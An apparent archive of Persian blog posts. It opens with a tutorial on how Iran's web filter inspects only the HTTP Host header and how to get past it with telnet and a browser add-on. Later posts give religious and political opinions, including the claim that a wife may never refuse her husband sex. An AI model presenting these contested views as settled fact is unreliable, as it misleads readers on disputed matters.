امشب برای راه‌اندازی چندنوع پراکسی با تکنولوژی‌های مختلف، مجبور شدم نحوه کارکرد سیستم فیلترینگ ایران رو بررسی کنم و به نتایج خیلی جالبی رسیدم که خوبه شما هم بدونید :

اولا که فیلترینگ تنها بر روی وب (یعنی پروتکل‌های HTTP , HTTPs) پیاده شده و هیچ پروتکل دیگری فیلتر نیست، در حالی که فیلترینگی که آمریکا به دلیل محرومیت بر ایران اعمال کرده تمام پروتکل‌ها رو شامل می‌شه. اما قبل از اینکه ادامه فرآیند فیلترینگ رو بدونیم، لازمه بدونیم که چگونه یک سایت بر روی کامپیوتر ما لود می‌شه.

فرآیند بارگزاری یک سایت

به عنوان مثال فرض کنید آدرس www.facebook.com/profile/abiusx رو در کاوشگر وب خودتون وارد کردید (Internet Explorer یا Mozilla Firefox). کاوشگر شما این آدرس رو به آدرس کاملی که شما حوصله تایپش رو نداشتید تبدیل می‌کنه:

http://www.facebook.com/profile/abiusx

این آدرس نوع پروتکل رو نیز در بر داره (که پیش فرض وب هست) و به کاوشگر اجازه می‌ده نحوه باز کردن اون رو تشخیص بده. قبل از هر کاری، کاوشگر وب باید بدونه www.facebook.com بر روی کدوم کامپیوتر سرور روی اینترنت قرار داره، یعنی شماره اون کامپیوتر رو بدونه. این فرآیند توسط پروتکل زیرساختی DNS انجام می‌گیره که آدرس‌ها رو به شماره تبدیل می‌کنه.

نکته مهمی که بعدا به اون بر خواهیم خورد اینه که DNS ماهیت پرسش و پاسخی داره، یعنی کامپیوتر شما از کامپیوتر دیگری در شبکه (که معمولا ISP یا همون سرویس دهنده اینترنتتون هست) سوال می‌کنه که این آدرس شماره اش چنده؟ و پاسخ می‌گیره. بسیاری از فیلترینگ‌ها در دنیا در همین مرحله پیاده می‌شن، یعنی کامپیوتر بالادست به شما پاسخ می‌ده که این آدرسش 10.10.34.34 هست (آدرس کامپیوتری که صفحه فیلترینگ روش قرار داره)، اما اینگونه فیلترینگ به سادگی قابل رفع هست. کافیه شما یک کامپیوتر خارج از ایران رو به عنوان DNS خودتون مشخص کنید، مثلا 4.2.2.4 رو در تنظیمات اتصال به شبکه به عنوان آدرس کامپیوتر DNS خودتون وارد کنید و نگذارید که اتوماتیک مشخص شه. از این پس سوالات DNS شما از این کامپیوتر پرسیده می‌شه و قاعدتا پاسخ‌های اون هم واقعی هستند و صفحه فیلترینگ نیستند.

همچنین باید توجه کرد که هر کامپیوتری در شبکه (اینترنت) که معمولا یک شماره داره، ممکنه یک یا چند سایت رو روی خودش سرویس دهی کنه. معمولا سایت‌های کوچک و کم مشتری بر روی کامپیوترهایی با چند سایت دیگر مشترک هستند، سایت‌های معمولی و پربازدید بر روی یک سرور اختصاصی با یک شماره هستند و سایت‌های معروف بر روی چندین سرور مختلف به صورت همزمان سرویس‌دهی می‌شوند.

برای درک این نسخه، برنامه ترمینال (Command Prompt) خود را باز کنید و دستورات زیر را وارد نمایید :

nslookup www.google.com

دستور فوق چندین شماره برمی‌گرداند، زیرا سایت گوگل بر روی چندین سرور مختلف سرویس دهی می‌شود

nslookup www.etebaran.ir

دستور فوق تنها یک شماره برمی‌گرداند زیرا این سایت بر روی یک سرور قرار دارد.

nslookup www.abiusx.com

nslookup www.etebaran.com

هر دوی دستورات زیر یک آدرس برمی‌گردانند، زیرا هردو سایت بالا بر روی یک کامپیوتر سرو می‌شوند.

پس از اینکه کاوشگر شماره کامپیوتر مقصد رو به دست آورد، یک اتصال شبکه از نوع TCP بر روی پورت ۸۰ (پورت مخصوص وب) برقرار می‌کنه و یک درخواست از نوع HTTP ارسال می‌کنه که جناب کامپیوتر مقصد، من فلان صفحه شمارو می‌خوام. قالب این درخواست متنی به صورت زیره :

GET http://www.facebook.com/profile/abiusx HTTP/1.1 Host: www.facebook.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:5.0.1) Gecko/20100101 Firefox/5.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Cookie: PHPSESSID=9PmTx2exnapZfHmnegR9MsiPb2C00aDc6 If-Modified-Since: Sat, 30 Jul 2011 15:21:45 GMT Cache-Control: max-age=0

این درخواست HTTP دارای اطلاعات خاصی است. برخی از خط‌های آن اختیاریست و برخی خط‌ها هم در بعضی درخواست‌ها وجود دارد که اینجا نیست. خط اول نوع درخواست (GET)، آدرس آن و نسخه پروتکل (1.1)‌ را معین می‌سازد. این خط مهمترین خط است و برای سرور مقصد همین یک خط به عنوان درخواست کفایت می‌کند تا بداند چه چیزی را باید به ما تحویل دهد.

در خط دوم، سایت مورد نظر ذکر می‌شود. این خط توسط سرور وب استفاده می‌شود تا اگر چند سایت بر روی سرور قرار دارد، تشخیص دهد که کدامیک از آنها را باید نمایش دهد. لذا اگر تنها یک سایت بر روی سرور باشد، این خط کارایی ندارد. این خط جزو استاندارد HTTP است و باید همواره ذکر شود.

خط‌های بعدی نوع کاوشگر مبدا و سیستم عامل و زبان‌های قابل فهم و زمان و غیره را مشخص می‌کند تا سرور مقصد بر اساس آنها صفحه مناسب را ارائه دهد. این خط‌ها تنها برای کاوشگران حرفه‌ای وب مهم هستند.

سرور مقصد پس از دریافت این اطلاعات و پردازش آن، صفحه مورد نظر را پیدا کرده در قالب پاسخ HTTP با فرمت زیر ارسال می‌کند:

HTTP/1.1 200 OK Date: Mon, 23 May 2005 22:38:34 GMT Server: Apache/1.3.3.7 (Unix) (Red-Hat/Linux) Last-Modified: Wed, 08 Jan 2003 23:11:55 GMT Etag: "3f80f-1b6-3e1cb03b" Accept-Ranges: bytes Content-Length: 438 Connection: close Content-Type: text/html; charset=UTF-8

این پاسخ نمایانگر مشخصات سرور و وضعیت پاسخ است که توسط کاوشگر ما پردازش می‌شود. در ادامه این سرآیند، معمولا حجم انبوهی داده به قالب HTML (زبان ارائه وب) پیوست شده است که متن است، ولی توسط چشم انسان به سادگی قابل فهم نیست ولی توسط برنامه کاوشگر وب قابل درک است. کاوشگر وب این داده را پردازش می‌کند و در قالب صفحات وب بر روی صفحه رسم می‌کند تا کاربر آنها را مرور کند.

نکته‌ای قابل توجه آنست که در میانه پردازش این داده، کاوشگر گاهی مجددا به آدرسی دیگر (مثل آدرس یک تصویر یا یک تکه صوت یا اسکریپت) بر می‌خورد و مجددا به همان سرور درخواستی ارسال می‌کند تا آن تکه داده را نیز دریافت کند و در رسم صفحه به کار بگیرد.

چگونگی فیلترینگ

یک فیلترینگ خوب، باید در مراحل مختلف بر روی درخواست و پاسخ اعمال شود. ابتدا اینکه در مرحله DNS باید پاسخ مقتضی برگرداند، که البته به راحتی قابل رفع است. سپس در مرحله درخواست باید خط اول و دوم را بررسی کند و آدرس سایت مقصد را استخراج کند و بر اساس آن تشخیص دهد که فیلتر شده است یا خیر. اگر فیلتری شده بود، پاسخ HTTP از نوع انتقال صفحه ( 301 Redirect)‌ به آدرس صفحه فیلترینگ را به جای آدرس اصلی برگرداند.

در مرحله سوم باید بر اساس محتوای داده بازگشتی از سایت مقصد، تصمیم بگیرد که آنرا نگه دارد یا با انتقال تغییر دهد. اینکار از نظر پردازش بسیار هزینه‌بر است زیرا باید یک برنامه پیچیده تمام داده را مطالعه و پردازش کند و الگو‌های مورد نظر را تطبیق دهد، ولی معمول‌ترین روشیست که استفاده می‌شود.

در ایران فیلترینگ تنها در فاز دوم (تشخیص آدرس از سرآیند) آنهم به صورت ناقص صورت می‌گیرد، یعنی تنها سرآیند Host بررسی می‌شود و آدرس آن با لیست فیلترینگ تطبیق یک به یک داده می‌شود، به همین دلیل بود که مثلا تا مدت بسیاری آدرس ww.facebook.com برای دسترسی به فیس بوک قابل استفاده بود.

راه ساده عبور از فیلترینگ

از آنجایی که تنها سرآیند Host در درخواست ما بررسی می‌شود و آدرس می‌تواند در خط اول درخواست جای گیرد و Host به کلی حذف شود (یا با آدرس سایتی بی مورد جایگزین شود)، راه بسیار ساده‌ای برای رفع فیلترینگ سایت‌هایی که سرور اختصاصی دارند وجود دارد. البته سایت‌هایی که با دیگر سایت‌ها در یک سرور مشترک هستند نیاز به Host دارند تا سرورشان تشخیص دهد کدام سایت درخواست شده است و مثلا همین سایت بنده را با اعمال این راه‌حل نمی‌توانید مرور کنید.

قبل از توضیح روش اعمال، فرآیند زیر را انجام دهید تا بیشتر با جزئیات کار آشنا شوید:

ترمینال (Command Prompt) خود را اجرا نمایید و دستور زیر را وارد کنید

telnet facebook.com 80

دستور فوق یک اتصال به سرور موجود در facebook.com بر روی پورت 80 ایجاد می‌کند (همان کاری که کاوشگر می‌کند). پس از برقرار اتصال پیامی مبنی بر آماده بودن ارسال اطلاعات به شما می‌دهد. حال باید درخواست HTTP را وارد کرد.

GET /profile/abiusx HTTP/1.1

Host: www.facebook.com

پس از وارد کردن این دو خط، دوبار کلید Enter را فشار دهید. پس از چند لحظه پاسخ بر روی صفحه ظاهر خواهد شد :

HTTP/1.1 403 Forbidden LCT4-3

کد نتیجه 403 یعنی عدم اجازه دسترسی، به همراه بدنه‌ای که کاوشگر شمارا به سایتی در آدرس http://10.10.34.34 هدایت می‌کند به عنوان پاسخ ارسال شده است (در زبان HTML) با کمی مرور متن پاسخ این اطلاعات مشخص است. اکنون فرآیند زیر را انجام دهید تا پاسخ فیلتر نشود :

ترمینال خود را باز نمایید و دستور زیر را وارد کنید :

telnet facebook.com 80

پس از برقرار اتصال تک خط درخواست زیر را وارد کرده، دوبار کلید Enter را بزنید:

GET http://www.facebook.com/profile/abiusx HTTP/1.1

پاسخی به صورت زیر خواهد داد، که یعنی صفحه‌ای که شما می‌خواهید در آدرس دیگری قرار دارد (از آنجایی که نوع کاوشگر را مشخص نکرده‌اید، فیس بوک فکر می‌کند نوع خاصی از تلفن همراه هستید که صفحه آن آدرس خاصی دارد). آن آدرس را مجددا درخواست کنید و دوبار Enter بزنید:

GET http://www.facebook.com/common/browser.php HTTP/1.1

حجم نسبتا زیادی اطلاعات در قالب HTML خروجی داده می‌شود که همان صفحه فیس بوک است.

HTTP/1.1 302 Found Location: http://www.facebook.com/common/browser.php Content-Type: text/html; charset=utf-8 X-FB-Server: 10.27.60.111 Date: Sun, 31 Jul 2011 03:05:00 GMT Content-Length: 0

انجام این فرآیند به صورت دستی بسیار دشوار است، و همچنین خروجی HTML برای انسان قابل فهم نیست. اما این مکانیزم را به سادگی می‌توانید در مرورگرهای قدرتمند پیاده کنید. به عنوان مثال در مرورگر Firefox افزونه Modify Headers را نصب کنید. پس از اتمام نصب و راه‌اندازی مجدد مرورگر، از منوی Tools صفحه تنظیمات آنرا باز کنید. در فیلد های موجود Action را معادل Filter و Header name را معادل Host قرار داده، کلید Add را فشار دهید. اکنون فیلتر اضافه شده در لیست را انتخاب کرده، کلید Enable را فشار دهید تا چراغ کنار آن سبز شود.

حال به آدرس www.abiusx.com مراجعه کنید. با پیام خطای سرور مواجه خواهید شد، زیرا نتوانسته تشخیص دهد کدام سایت روی آنرا خواسته‌اید. اما اگر به سایت www.facebook.com مراجعه نمایید مشاهده می‌کنید که مشکلی وجود ندارد و سایت بدون مشکل باز می‌شود. (البته توجه داشته باشید که برخی از تصاویر، به دلیل قرار داشتن بر روی سرورهای چندسایتی، بار نخواهند شد).

پس از اینکه از سایت‌های مورد نظر (که قبلا فیلتر بودند)‌ دیدن کردید، می‌توانید مجددا از پنجره تنظیمات Modify Headers، فیلتر را انتخاب کرده آنرا غیر فعال کنید.

WB-Tree

AbiusX — Wed, 22 Jun 2011 18:32:51 +0000

آقای Jaffer یک پیاده‌سازی تر و تمیز و خوب و کاملا متن باز و قابل استفاده از B+ Tree انجام داده که خیلی راحت قابل استفاده هست و امکانات خوبی هم داره. ایشون از MIT هستند و زبان SCM که یک پیاده‌سازی آزاد و استاندارد از Scheme هست رو به همراه SLib پیاده‌سازی کرده.

این کتابخونه که WB-Tree نام داره، در سی پلاس پلاس قابل استفاده نبود که بعد از کمی تعاملات و همکاری بین من و ایشون، قابل استفاده شد و یک راهنما و یک برنامه نمونه برای اون نوشتم. آدرس راهنما به شرح زیر هست :

http://abiusx.com/code/wb/

این پروژه و راهنما جهت پروژه ذخیره و بازیابی دانشجویان مهندسی کامپیوتر شهید بهشتی مهیا شده ولی در انواع پروژه‌های دیگر با ضریب اطمینان بالایی قابل استفاده هست. این راهنما در حال حاضر به عنوان راهکار اصلی استفاده از کتابخانه درC++ هم در سایت اصلی مطرح شده. امیدوارم مفید باشه.

تقابل فضل و عدالت الهی

AbiusX — Thu, 02 Jun 2011 07:30:27 +0000

از مسائلی که ممکن است ذهن آدم را درباره عدل الهی مشغول کند، بحث فضل خداست. دقت داشته باشید که عدالت از ویژگیهای ذاتا مطلوبه و لذا چون خدا عادله ما نمی‌گیم عدالت خوبه، بلکه ذاتا عدالت خوبه. البته تعیین مصادیق عدالت خیلی کار راحتی نیست ولی در یک کلیاتی ممکن است.

فضل خداوند، ناشی از رحمت خداوند، یعنی اینکه خداوند به هرکسی که بخواهد خارج از حساب می‌دهد. شاید بارزترین مصداق فضل خداوند، معصومین و اولیا باشند، که خداوند به آنها از جایی که حساب نکنند بخشیده. ممکن است سوال پیش بیاید که معصوم بودن معصومین و عدم امکان معصوم بودن (یا امام و پیامبر) بودن امثال ما، چگونه با عدل الهی سازگار است؟ و سوالاتی از این قبیل که همگی مرتبط به فضل خداوند هستند، یعنی جایی که خداوند بی حساب به کسی می‌بخشد. اصلا مگر بی حساب بخشیدن عادلانه است؟

مشکل ازینجاست که در مصداق سنجی عدالت، همواره به موارد دنیایی و مادی اندیشیده‌ایم و با مدل دنیا سنجیده‌ایم. در این دنیا، اگر حاکم از بیت المال به کسی چیزی بیشتر دهد (از فضل خود)، عادلانه نیست، زیرا باعث شده به بقیه سهم کمتری برسد. حتی اگر معلمی به شاگردی نمره بیشتر دهد، هرچند ظاهرا حق دیگران را کمتر نکرده، ولی عملا از آنجایی که نمره و معدل در امکانات تعلق گرفته بعدی موثر است، عادلانه نیست زیرا دیگران را با اینکار پایینتر آورده و از حقوق آتی آنها کاسته است. لذا دنیا محدود است و هرگونه فضل دنیایی، محکوم به بی عدالتی.

اما خداوند اینگونه نیست و از بیکران فضل خود را عطی می‌کند. اگر خداوند به کسی خیر دنیا و آخرت را ببخشد، حتی بدون حساب،‌نه از دیگران چیزی کم می‌شود و نه ضرری متصور آنان می‌گردد. از این رو خداوند حکیم این را ذکر می‌کند که به هرکسی هرآنچه بخواهیم می‌بخشیم و بزرگان نیز این را با عدالت خدا همسو می‌دانند، هرچند نفس انسان در ابتدا از پذیرش آن سر باز زند.

خوشحالی و ناراحتی

AbiusX — Wed, 11 May 2011 11:10:06 +0000

مطلبی که می‌نویسم، پیش‌نویسش برای ۱۶ آذر ۸۹ است. اما به نظرم الان در بین پیش‌نویس‌هایی که دارم مهمترین مورد است، امیدوارم که با خواندن آن گوشه تاریکی از ذهن و دلمان روشن شود.

از مسائلی که در زندگی خیلی با آنها درگیر هستیم، خوشحالی و ناراحتی یا به عبارت کلی‌تر مود (Mood) ماست. هیچکس نمی‌تواند ادعا کند که زندگی انسان از خوشحالی و ناراحتی تشکیل نشده‌است و فردی دائم خوشحال یا دائم ناراحت بوده است. قصد من مدل کردن ناراحتی و خوشحال در این نوشته نیست، بلکه قصد دارم به تاثیرات این دو «حس» بر روی زندگی انسان بپردازم.

اگر پس از انجام کاری احساس خوشحالی کنیم و از آنجام آن مسرور شویم، این عمل در ذهن ما تاثیر می‌گذارد و آنرا با خاطره خوشی یاداوری می‌کنیم. برعکس اگر از انجام کاری (چه توسط ما و چه دیگران) ناراحت شویم، سعی می‌کنیم زیاد به آن فکر نکنیم و در ناخودآگاه ذهن خود آنرا نامناسب می‌پنداریم.

این تفکرات ناخودآگاه، در دراز مدت باعث می‌شود به این نتیجه برسیم که هر کاری که ما را خوشحال می‌کند، کاری خوب و «درست» است و هر کاری که از انجام آن ناراحت می‌شویم کاری بد و «غلط» است، تا جایی که خوشحالی و ناراحتی محور اصلی تصمیم‌گیری‌ها و تعیین مسیر زندگی ما می‌گردد، همانطوری که فرهنگ گمراه لیبرالیزم اعتقاد دارد باید طوری زندگی کرد تا خوشحال بود و در هر زمان تنها پاسخ پرسش «Are you happy doing this» می‌تواند در تصمیم‌گیری به ما کمک کند.

اما آیا واقعا اینچنین است؟ قطعا اینچنین نیست و این از نفس و فطرت حیوانی ماست که نشات می‌گیرد، چنانچه حیوانات بر اساس همین احساس عمل می‌کنند و کاری به منفعت و مصلحت و غیره ندارند. برای اینکه ملموس‌تر درک کنیم اینچنین نیست، چند مثال می‌زنم :

امر به معروف و نهی از منکر که کاری واجب و مهم است، معمولا باعث ناراحت شدن مخاطب می‌شود (و به دلیل همین ناراحتی در او تاثیر می‌گذارد)

استفاده از مواد مخدر و مشروبات الکلی، به سادگی می‌تواند خوشحالی و شادی انسان را چندین برابر کند، اما آیا مصرف آنها کاری درست است؟ (و به همین دلیل است که در فرهنگ‌های لیبرال مصرف این موارد بسیار بسیار بالاست)

انسان‌های موفق و تاثیرگذار هموارد سختکوش و سختی کشیده بوده‌اند. زندگی اینگونه انسان‌ها معمولا هموار نبوده و قسمت عمده آنرا ناراحتی‌های بزرگ تشکیل داده است. برعکس انسان‌های سبک مغز و بی تاثیر معمولا زندگی راحت و خوشی داشته‌اند.

بنابراین باید توجه داشت که تصمیم‌گیری و قضاوت در مورد درستی و غلطی کارها نباید توسط احساس انسان، آنهم احساس ناخودآگاه خوشحالی و ناراحتی صورت بگیرد و انسانی موفق‌تر خواهد بود که بتواند تاثیر این احساسات را در اتخاذ تصمیمات خود به حداقل برساند.

حال واقعا ما چقدر بر اساس این دو احساس تصمیم می‌گیریم و عمل می‌کنیم؟

وظایف زن و مرد در زندگی زناشویی

AbiusX — Fri, 06 May 2011 14:26:59 +0000

چند وقت پیش مطلبی در این باب شنیدم و بررسی‌هایی هم کردم، و بعد که به سراغ اینترنت و سایت‌های به اصطلاح آخوندی رفتم و دنبال وظایف زن و مرد در زندگی زناشویی گشتم، غیر از قصه و توصیه و عقاید شخصی چیزی گیرم نیامد. هرکسی زحمت کشیده بود یک مشت حدیث لیست کرده بود که معلوم نبود درست باشند یا نه و یک سری نتیجه مشکوک تر از حدیث از آنها گرفته بود و یک طومار وظایف تافته بود.

لذا تصمیم گرفتم به صورت دقیق و قطعی، همانگونه که شایسته مکتب عدلیه (شیعه)‌است و برعکس نوشته‌های دیمی و غیر دقیق و روی هوا که باعث شک و تردید و تفرقه می‌شود، این بحث رو که بسیار کوتاه هم هست بنویسم، چون احساس می‌کنم برای هرکسی که می‌خواهد ازدواجی اسلامی داشته باشد، دانستن این مطلب بسیار بسیار مهم است و می‌بینم افرادی رو که به خاطر ندانستن این موضوع به خاکی زده‌اند.

وظایف قطعی مرد در قبال زن در زندگی زناشویی:

نفقه، شامل (خوراک، پوشاک، مسکن)‌در حد شانیت زن: توجه داشته باشید که اگر مثلا زنی از یک خانواده ثروتمند بگیرد، باید در حد شان همان زن و همان خانواده نفقه برای زن تامین کند و این وظیفه اوست (اگر نتواند قصور کرده است). نفقه توسط مرد برای زن هزینه می‌شود و جزو مایملک زن تلقی می‌گردد.

نگهداری و تربیت فرزندان: تعجب نکنید، این هم وظیفه مرد است هرچند معمولا خانم‌ها انجام می‌دهند. به دلیل همین وظیفه هم هست که حضانت فرزند متعلق به مرد است.

نگهداری و رتق و فتق خانه: بله این هم وظیفه مرد است. به همین دلیل است که زن می‌تواند برای هرکاری که در منزل انجام می‌دهد، طلب مزد کند و یا انجام ندهد.

تمکین نسبی: مرد وظیفه دارد که از شب‌های خود قسمتی را حتما به همسر خود اختصاص دهد و پیش او باشد. همچنین مرد وظیفه دارد در هر مدت (حدود عرفی چند ماه) حداقل یکبار خود را از همسرش دریغ نکند.

وظایف قطعی زن در قبال مرد در زندگی زناشویی:

تمکین : تنها وظیفه زن در قبال مرد در زندگی زناشویی تمکین است. تمکین در اصطلاح فقهی یعنی هرموقع مرد از زن درخواست همبستری کرد، زن نباید رد کند (مگر اینکه عذر قطعی داشته باشد).

توجه داشته باشید که از نظر اسلام، وظایف زن و مرد در زندگی زناشویی فقط همانست که در بالا بیان شد، اما از آنجایی که زندگی زناشویی بر عاطفه و محبت استوار است و نه بر قانون (بر عکس خانواده قانونمند و خشک غربی) معمولا زنها که عاطفی‌تر هستند بسیار بیشتر فداکاری می‌کنند. فراموش نکنیم که این فداکاری در طی تاریخ به عرفی تبدیل گشته که وظایف زن را آنچنان دستخوش تغییر کرده که تصویر همگی ما از زندگی زناشویی و وظایف زن و شوهر و باالتبع آن قوانین حوزه زناشویی، جابجا شده است.

متعه از دیدگاه قرآن

AbiusX — Thu, 21 Apr 2011 21:50:47 +0000

یک تحقیق جمع و جوری انجام دادم در باب اثبات اینکه متعه جایز و حلاله برای نقطه شروع. بعد از اینکه حلت اثبات شد به ویژگی‌ها و شرایط بهتر می‌شه پرداخت. اگر دوستان مایل بودند مطلب رو منتشر کنند که دیگران هم استفاده کنند. ممنون

http://abiusx.com/archive/html/mut’a.html

معرفت / استدلال

AbiusX — Thu, 07 Apr 2011 21:14:26 +0000

علم (که در این مطلب به معرفت و شناخت اشاره دارد) از چند طریق به دست می‌آید؛ از میان آنها تنها به علم حصولی خواهیم پرداخت و علم‌هایی که به گونه‌های دیگر (مانند وحی و غیره)‌به دست می‌آیند بررسی نمی‌کنیم.

انواع استدلال

علم به طور کلی از راه استدلال به دست می‌آید، بنابراین نظریه‌هایی که از وهم ناشی می‌شوند علم نمی‌نامیم. (قسمت عمده‌ای از خلاقیت انسانی از قوه وهم بهره می‌گیرد). استدلال نیز به سه دسته زیر تقسیم می‌گردد:

استنتاج ( به طور دقیقتر کسر) Deduction

استقرا Induction

استنتاج Inference

متاسفانه در واژگان فارسی هر سه این لغات به قیاس یا استنتاج ترجمه می‌شوند. کسر یعنی از یک حکم جامع و شامل به یک حکم جزئی‌تر رسیدن، از علت به معلول رسیدن (ترجمه لغوی)؛ مثلا اگر افتاب بتابد هوا گرم می‌شود. استقرا یعنی از جزء به کل رسیدن. مثلا اگر به صد پرنده سنگ پرت کنی فرار کنند، نتیجه می‌گیری به صد و یکمی هم سنگ پرت کنی فرار می‌کند. (استقرای ریاضی با استقرا تفاوت دارد و یک نوع کسر است).

اما استنتاج (Inference) یعنی در عرض جلو رفتن. به عنوان مثال اگر a=b , b=c استنتاج می‌کنیم که a=c. این حکم را به دست نیاورده‌ایم، موجود بوده و تنها آنرا به لیست احکام اضافه کردیم. (تا حدودی شبیه کسر) جالب توجه آنکه ذهن انسان قسمت عمده زمان تفکر و تعقل را صرف استنتاج می‌کند تا از چیزهایی که می‌داند به ظاهر چیزهایی جدیدی یاد بگیرد.

معرفت شناسی

پوزیتیویسم، استقرا و آزمایش

مکتب پوزیتیویسم (Positivism) که بنیان غرب امروزی بوده و هست، بر مبنای استقرا بنا شده است. در این تفکر، کسر به عنوان روشی برای کسب علم وجود ندارد و تنها از استقرا می‌توان به علم رسید، به همین دلیل است که این مکتب چیزهایی مثل روح و یا دین را به هیچ وجه علم نمی‌داند (زیرا قادر به تجربه کردن و آزمایش و استقرای آن نیست).

توجه به این نکته اساسیست که در واقع عملکرد استقرا شبیه‌سازی کسر است، که با ضعف صورت می‌گیرد. به عنوان مثال ما استدلال می‌کنیم که «چون سیب از درخت بر سر نیوتون افتاد، پس نیروی جاذبه در زمین وجود دارد» در حالی که این استدلال نادرست است، زیرا اگر سیب بر سر نیوتون نیافتد هم جاذبه وجود دارد، پس علت وجود جاذبه، افتادن سیب نبوده. در واقع در استقرا سعی داریم بگویم «چون جاذبه وجود دارد سیب از درخت بر سر نیوتون افتاد» اما چون نمی‌توانیم این حکم را ثابت کنیم از نسخه معکوس و نادرست قبلی استفاده می‌کنیم.

به همین دلیل است که استقرا معرفت قطعی و جزمی به ما نمی‌دهد و از همین روست که اپیستمولوژی غرب به جایی رسیده که ادعا می‌کند هیچ معرفت قابل اثبات و صحیحی وجود ندارد و هرچیزی که قابل رد کردن و آزمایش کردن نباشد هم علم نیست.

کسر و پیش‌نیازهای آن

برای آنکه بتوانیم از استدلال کسری استفاده کنیم، باید ابتدا اصول صحیحی را در نظر «فرض» بگیریم که بتوانیم آنها را کسر دهیم و به نتایج و احکام دیگری برسیم. این اصول صحیح را منطق می‌نامیم و آنرا تعریف می‌کنیم « آن چیزی که انسان‌های سالم به صورت مشترک و بدیهی قبول دارند»؛ مثل اینکه جمع نقیضین محال است. در واقع منطق علمی حضوریست که هر انسانی بدون تلاش آنرا درون خود دارد و اگر آنرا نداشته باشیم، امکان بهره گیری از کسر را نیز نخواهیم داشت.

پس از فرض گرفتن منطق و اصول آن (محال بودن دور، محال بودن تسلسل، محال بودن جمع نقیضین و …) به ناگه حجم انبوهی از گذاره‌های عقلی مسلم به حوزه احکام اضافه می‌گردند که با تجمیع و کسر آنها می‌توان حجم انبوهی از علم را در دست داشت.

اسلام و علم

مکتب عدلیه (شیعه) با اتکا به منطق و قائل شدن اعتبار ذاتی برای عقل (انسان با عقل به دنیا می‌آید) به اثبات وجود خدا، صفات وی، معاد، نبوت و … می‌پردازد. تمامی این احکام نیز به صورت کسری اثبات می‌گردند و از استقرا استفاده‌ای نمی‌شود، به همین دلیل این شق از علم مشکوک و نسبی نیست.

لازم به ذکر است که علم کسری خصوصا در بین علمای اسلامی تا حدود بسیار زیادی پیش رفته و به قله‌های بسیار مرتفعی رسیده‌است که به دلایل مختلف به اندازه کافی با آن آشنا نیستیم. همین علم کسری نیز باعث دوران طلایی جهان اسلام شد که در ظرف چند صد سال سریعترین رشد علم در کل تاریخ بشر را در جهان اسلام مشاهده کردیم (که بر آشنایان با آن واضح است قابل مقایسه با رشد علم در حال حاضر نبوده است). می‌توان دلیل این امر را اتکای مسلمانان به بخش‌های قطعی از علم دانست که با کسر به دست آمده و باعث شده بودند کاخ علم به سادگی علم شود. (شاید به همین دلیل ایران با رشد متوسط ۱۱ برابر دنیا در تولید علم، در حوزه معرفت‌شناسی و اپیستمولوژی کمتر از میانگین جهان فعالیت داشته است، به علت عدم نیاز)

انقلاب مصر و برخورد صحیح با آن

AbiusX — Sun, 30 Jan 2011 16:08:47 +0000

قلم فرسایی نمی‌کنم، مطلبی راجع به ماهیت انقلاب مصر، تاثیرات احتمالی آن و برخورد صحیح با آن می‌نویسم که برای عزیزانی که اهمیت سیاست را درک می‌کنند بسیار مفید خواهد بود ( انشالله )

اولا که انقلاب مصر حتما به صلاح نخواهد بود، اگر دموکراسی آمریکایی در مصر برقرار بشود قطعا از دیکتاتوری مبارک بدتر خواهد بود و همین دین و ایمانی که مردم دارند نیز بر باد خواهد رفت (زیرا در دیکتاتوری حاکم ظلم می‌کند و مردم مظلوم هستند، اما فساد در سطح مردم نیست و در سطح حکام است ولی در دموکراسی حکام و مردم یکپارچه می‌شوند و اگر حکام فاسد باشند مردم نیز فاسد خواهند بود. توضیحات بیشتر در مطلبی دیگر)

ثانیا همانطور که همه می‌دانند، انقلاب مردم مصر رهبری منسجم ندارد و به دلیل انعکاس دومینویی انقلاب‌های تونس و اطراف رخ داده است. این امر بسیار خطرناک است و تا وقتی رهبری برای انقلاب معین نباشد، خط و مشی دقیق آن نیز معلوم نیست و هر جریانی می‌تواند آنرا دستکاری و مصادره کند.

ثالثا ۹۰ درصد جمعیت مصر مسلمان هستند و در تصاویر راهپیمایی‌ها بر همه مسلم بود که انقلاب به دست مسلمانان غلیظ در دست انجام است و قشری که حداقل ظاهرا شدیدا مسلمان نباشد در جمعیت دیده نمی‌شد.

با این اوصاف تمام جریانات مختلف، خیز برداشته‌اند تا از آب گلالود ماهی بگیرند و انقلاب مصر را به نفع خود مصادره کنند. آمریکا با رهبر نشان دادن البرادعی و اعلام دروغین اینکه او تحت فشار است که رهبری را به دست نگیرد، عربستان با حمایت از دولت جاری، ایران و اسرائیل با سکوت و هر جریان دیگری به نوبه خود. اما نباید تمام تحلیلات را به موسسه‌های آمریکایی قدرتمند مانند RAND بسپاریم که اگر اینگونه عمل کنیم نتیجه نیز از آن آنان خواهد بود.

در این میان جریان موسوم به جنبش سبز قصد برگزاری تجمعی در ایران را دارد، غافل از اینکه این خط از آمریکا منشاء گرفته تا نه تنها انقلاب مصر را به جنبش سبز پیوند زند و ماهیت آندو را به جهانیان یکسان نمایان کند، بلکه افکار عمومی را از التهاب مصر کمی دور کند.

اما ایران نیز به دلیل حساسیت موضوع امکان هیچگونه اعلام نظر رسمی سیاسی ندارد که جریانات مخالف به شدت منتظر این عکس العمل هستند تا تحرکات مصر را گردن ایران و عوامل جاسوسی آن بیاندازند و بار دیگر ما را تروریست و دشمن ملت‌ها معرفی کنند. از طرف دیگر در صورتی که ایران هیچ موضعی نگیرد، چگونه می‌تواند جریان را به نفع خود مصادره نماید؟

راه حلی که به نظر من رسید اینست که تظاهرات مردمی گسترده‌ای، بدون پوشش دولتی در ایران در پشتیبانی از انقلاب مصر برگزار شود. بدینسان نه تنها ماهیت انقلاب مصر به ماهیت انقلاب اسلامی تغییر خواهد کرد بلکه این انقلاب برای ایران و مردم و راه آن مصادره خواهد شد و در صورتی که مصر انقلاب اسلامی کند و به جبهه ایران بپیوندد، اسرائیل در آینده نزدیک و آمریکا در آینده دور از صحنه حذف خواهند شد.

تعریف ایمان در ادیان

AbiusX — Sat, 29 Jan 2011 19:25:04 +0000

مطلب بسیار کوتاهی در خدمت شما هستم در باب تعریف ایمان در ادیان.

ایمان یا Faith در ادیان غربی و سکولار امروزی (مسیحیت، یهودیت و …) تعریف زیر را دارد:

strong belief in God or in the doctrines of a religion, based on spiritual apprehension rather than proof.

یعنی

